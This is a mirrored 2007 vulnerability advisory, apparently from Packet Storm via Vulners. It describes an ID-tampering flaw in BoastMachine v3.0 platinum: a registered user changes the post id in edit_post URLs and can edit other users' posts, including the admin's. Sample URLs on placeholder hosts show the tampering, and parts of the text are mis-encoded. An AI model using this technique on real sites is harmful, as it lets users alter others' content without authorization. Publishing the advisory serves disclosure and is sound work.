Lucene search
boastmachine-session.txt
๐๏ธย 23 May 2007ย 00:00:00Reported byย VagrantTypeย 
ย packetstorm๐ย packetstormsecurity.com๐ย 15ย Views
BoastMachine v3.0 platinum - Session รd Hacking, security hole with ID interchangeability in URL, admin topic affected by user change
Show more
`Vagrant - E-hack.org (05.22.2007)
BoastMachine v3.0 platinum - Session รd Hacking
After the login into the site which alllows new user registration. Site
user's data which is entered to change the topic, can be changed by another
user, and that is a security hole because of ID interchangeability in URL
address space.
If the changed topic belongs to the admin it doedn't affect the free login
and site user has an authority to make changes and cop the topics.
------- >>>
Vulnerable;
http://www.xxx.com/login.php
http://www.xxx.com/user.php?action=list_posts
Edit posts;
http://www.e-hack.org/user.php?action=list_posts
Post title edit;
http://www.xxx.com/user.php?action=edit_post&blog=1&id=(155) = (รd)
New รd;
http://www.xxx.com/user.php?action=edit_post&blog=1&id=(154) = (รd)
Credits : Vagrant
Contact : [email protected]
Site : www.e-hack.org
_________________________________________________________________
Siz de iletiรพimin evrimine katรฝlรฝn!
http://www.communicationevolved.com/tr-tr/
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo23 May 2007 00:00Current
7.4High risk
Vulners AI Score7.4